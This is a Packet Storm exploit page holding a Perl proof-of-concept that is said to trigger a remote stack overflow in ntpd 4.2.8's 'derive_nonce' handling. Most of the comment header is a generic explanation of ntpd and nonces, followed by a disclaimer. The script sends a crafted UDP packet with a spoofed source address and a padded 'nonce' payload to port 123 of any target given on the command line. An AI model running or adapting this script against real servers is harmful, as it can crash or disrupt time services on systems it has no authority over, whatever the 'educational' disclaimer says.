Linux ntpd 4.2.8 derive_nonce Stack Overflow

2016-11-25T00:00:00
ID PACKETSTORM:139900
Type packetstorm
Reporter Todor Donev
Modified 2016-11-25T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# Linux ntpd 4.2.8 'derive_nonce' remote stack overflow PoC  
#  
# Copyright 2016 (c) Todor Donev  
# todor.donev@gmail.com  
# https://www.ethical-hacker.org/  
# https://www.facebook.com/ethicalhackerorg  
# http://pastebin.com/u/hackerscommunity   
#  
#   
# Description:  
# The ntpd program is an operating-system daemon that sets and maintains   
# a computer system's system time in synchronization with Internet-standard   
# time servers. It is a complete implementation of the Network Time Protocol   
# (NTP) version 4, but retains compatibility with versions 1, 2, and 3.  
# ntpd uses a single configuration-file to run the daemon in server and/or   
# client modes. The configuration file, usually named ntp.conf, is located   
# in the /etc directory. Other important files include the drift file, which   
# ntpd uses to correct for hardware-clock skew in the absence of a connection   
# to a more accurate upstream time-server.  
#  
# Nonce is an arbitrary number that may only be used once. It is similar in   
# spirit to a nonce word, hence the name. It is often a random or pseudo-random   
# number issued in an authentication protocol to ensure that old communications   
# cannot be reused in replay attacks. They can also be useful as initialization  
# vectors and in cryptographic hash function. A nonce is an arbitrary number used  
# only once in a cryptographic communication, in the spirit of a nonce word.   
# They are often random or pseudo-random numbers. Many nonces also include a   
# timestamp to ensure exact timeliness, though this requires clock synchronization   
# between organizations. The addition of a client nonce ("cnonce") helps to improve   
# the security in some ways as implemented in digest access authentication. To ensure   
# that a nonce is used only once, it should be time-variant (including a suitably  
# fine-grained timestamp in its value), or generated with enough random bits to ensure  
# a probabilistically insignificant chance of repeating a previously generated value.  
# Some authors define pseudo-randomness (or unpredictability) as a requirement for a  
# nonce.  
#  
# Disclaimer:  
# This or previous program is for Educational purpose ONLY. Do not   
# use it without permission. The usual disclaimer applies, especially   
# the fact that Todor Donev is not liable for any damages caused by   
# direct or indirect use of the information or functionality provided   
# by these programs. The author or any Internet provider bears NO   
# responsibility for content or misuse of these programs or any   
# derivatives thereof. By using these programs you accept the fact  
# that any damage (dataloss, system crash, system compromise, etc.)   
# caused by the use of these programs is not Todor Donev's   
# responsibility.  
#  
# Use at your own risk and educational purpose ONLY!  
#  
# Thanks to Maya Hristova and all my friends that support me.  
#  
# Suggestions,comments and job offers are welcome!  
#  
#  
  
use Net::RawIP;  
  
print "[ Linux ntpd 4.2.8 'derive_nonce' remote stack overflow PoC\n";  
print "[ ======\n";  
print "[ Usg: $0 <target>\n";  
print "[ Example: perl $0 133.71.33.7\n";  
print "[ ======\n";  
print "[ <todor.donev\@gmail.com> Todor Donev\n";  
print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";  
print "[ Website: https://www.ethical-hacker.org/\n";  
my $target = $ARGV[0];  
my $data = "\x26\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x6e\x6f\x6e\x63\x65\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";  
my $sock = new Net::RawIP({ udp => {} }) or die;  
$sock->set({ ip => { saddr => "192.168.1.1", daddr => $target},  
udp => { source, => 31337, dest => 123 , data => $data}});  
$sock->send;  
`